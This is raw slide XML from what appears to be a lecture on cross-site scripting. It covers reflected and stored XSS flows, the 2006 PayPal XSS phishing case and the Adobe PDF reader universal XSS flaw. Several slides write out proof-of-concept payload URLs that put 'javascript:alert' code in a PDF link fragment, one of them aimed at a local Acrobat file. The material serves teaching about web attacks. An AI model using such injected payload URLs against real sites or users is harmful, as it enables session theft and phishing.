                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17416" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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417" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4107" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2954338" y="1663700"/>
            <a:ext cx="2209800" cy="4000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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Collect email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>addr</a:t>
            </a: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4109" name="TextBox 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-743562">
            <a:off x="2616200" y="2270125"/>
            <a:ext cx="2522538" cy="4000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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send malicious email</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17420" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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421" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17422" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="263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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17423" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="194945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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="260667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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17425" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="370522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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17426" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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17427" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="6873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428" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17429" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="304800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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17430" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="400685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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill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600" y="1676400"/>
            <a:ext cx="1685925" cy="4000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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Email version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17432" name="Straight Arrow Connector 20"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="2046288" y="2303463"/>
            <a:ext cx="3440112" cy="77311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235183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       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" smtClean="0"/>
              <a:t>2006 Example Vulnerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="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sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Victims were then redirected to a phishing site and prompted to enter sensitive financial data.</a:t>
            </a:r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 smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="18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chemeClr val="tx2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>			Source: http://www.acunetix.com/news/paypal.htm</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18436" name="Picture 2" descr="PayPa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41667"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="736600" y="533400"/>
            <a:ext cx="177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30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209800"/>
            <a:ext cx="7543800" cy="101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40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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Adobe PDF viewer “feature”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460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PDF documents execute JavaScript code </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>code_here</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>The code will be executed in the context of the domain where the PDF files is hosted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>This could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t> be used against PDF files hosted on the local filesystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp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6705600" y="1047750"/>
            <a:ext cx="2058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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(version &lt;= 7.9)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="TextBox 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="6215063"/>
            <a:ext cx="85502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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://jeremiahgrossman.blogspot.com/2007/01/what-you-need-to-know-about-uxss-in.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169590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3048000"/>
            <a:ext cx="7620000" cy="4000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Here’s how the attack works:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484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648200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker locates a PDF file hosted on website.com </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker creates a URL pointing to the PDF, with JavaScript Malware in the fragment portion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>  http://website.com/path/to/file.pdf#s=javascript:alert(”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>”);) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Attacker entices a victim to click on the link </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>If the victim has Adobe Acrobat Reader </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>Plugin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> 7.0.x or less, confirmed in Firefox and Internet Explorer, the JavaScript Malware executes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6248400"/>
            <a:ext cx="7494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alert is just an example. Real attacks do something worse.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08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362200"/>
            <a:ext cx="7543800" cy="16319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40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="40458C"/>
              </a:solidFill>
            </a:endParaRP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And if that doesn’t bother you...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21508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PDF files on the local filesystem:</a:t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file:///C:/Program%20Files/Adobe/Acrobat%207.0/Resource/ENUtxt.pdf#blah=javascript:alert("XSS");</a:t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JavaScript Malware now runs in local context with the ability to read local files ...</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
            </a:b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290338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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Reflected XSS attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24579" name="Picture 18" descr="toshiba_satellite_a105_s4284_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01913"/>
            <a:ext cx="1436688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1" descr="CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="11557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DS15server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4188" y="1905000"/>
            <a:ext cx="2436812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943600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a:r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5562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24584" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2046288" y="1920875"/>
            <a:ext cx="3211512" cy="6873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</p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24585" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24586" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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4587" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3049588" y="4070350"/>
            <a:ext cx="1654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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>click on link</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24588" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2319338" y="4521200"/>
            <a:ext cx="263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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>echo user input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24589" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2714625" y="370522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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24590" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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24591" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2198688" y="2894013"/>
            <a:ext cx="3211512" cy="6873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4592" name="TextBox 37"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-709076">
            <a:off x="2846388" y="2749550"/>
            <a:ext cx="2305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40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>send valuable data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24593" name="Oval 38"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="304800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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24594" name="Oval 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2028825" y="400685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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4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914400" y="4019550"/>
            <a:ext cx="4953000" cy="1238250"/>
            <a:chOff x="914400" y="4019490"/>
            <a:chExt cx="4953000" cy="1238310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="TextBox 25"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3332163" y="4019490"/>
              <a:ext cx="2535237" cy="40006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rgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Send bad stuff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14400" y="4857731"/>
              <a:ext cx="2535238" cy="40006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rgbClr val="40458C"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Reflect it back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872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838200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25603" name="Picture 18" descr="toshiba_satellite_a105_s4284_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01913"/>
            <a:ext cx="1436688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1" descr="CompaqAlphaServerES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9475" y="4979988"/>
            <a:ext cx="11557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DS15server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4188" y="1905000"/>
            <a:ext cx="2436812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943600" y="1524000"/>
            <a:ext cx="1693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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attack Server</a:t>
            </a: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5562600" y="4552950"/>
            <a:ext cx="1760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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server Victim </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25608" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="5576887" y="3652838"/>
            <a:ext cx="1801813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5609" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="3886200"/>
            <a:ext cx="1465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660066"/>
                </a:solidFill>
              </a:rPr>
              <a:t>User Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25610" name="TextBox 19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6781800" y="3276600"/>
            <a:ext cx="1720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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Inject malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25611" name="Straight Arrow Connector 25"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2274888" y="3962400"/>
            <a:ext cx="2830512" cy="990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5612" name="TextBox 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="3036888" y="4067175"/>
            <a:ext cx="2141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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25613" name="TextBox 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1122022">
            <a:off x="2311400" y="4568825"/>
            <a:ext cx="2932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mtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>receive malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25614" name="Oval 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6750050" y="2865438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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25615" name="Oval 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1039646">
            <a:off x="2713038" y="3703638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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25616" name="Oval 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="1068865">
            <a:off x="2084388" y="408622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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25617" name="Straight Arrow Connector 34"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="4324350"/>
            <a:ext cx="3352800" cy="11620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25618" name="Straight Arrow Connector 36"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
